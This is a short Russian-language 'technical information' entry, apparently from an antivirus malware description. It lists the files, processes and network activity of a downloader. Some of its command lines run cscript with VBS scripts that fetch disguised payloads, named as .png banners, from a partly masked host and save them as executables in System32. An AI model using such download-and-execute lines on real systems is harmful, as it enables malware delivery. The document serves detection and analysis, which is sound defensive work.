Техническая информация
- <SYSTEM32>\wmpupdt.exe (загружен из сети Интернет)
- <SYSTEM32>\cscript.exe dffecd.vbs http://www.pt##.org.br/banner4.png <SYSTEM32>\wmplugin.rgb
- <SYSTEM32>\cscript.exe ecceff.vbs http://www.pt##.org.br/banner3.png <SYSTEM32>\wmpupdt.exe
- <SYSTEM32>\wmpupdt.exe
- <SYSTEM32>\wmplugin.rgb
- <Текущая директория>\ecceff.vbs
- <Текущая директория>\dffecd.vbs
- <Текущая директория>\dffecd.vbs
- <Текущая директория>\ecceff.vbs
- 'www.pt##.org.br':80
- www.pt##.org.br/banner4.png
- www.pt##.org.br/banner3.png
- DNS ASK www.pt##.org.br
- '<IP-адрес в локальной сети>':1035
- '<IP-адрес в локальной сети>':1034
- ClassName: 'Shell_TrayWnd' WindowName: ''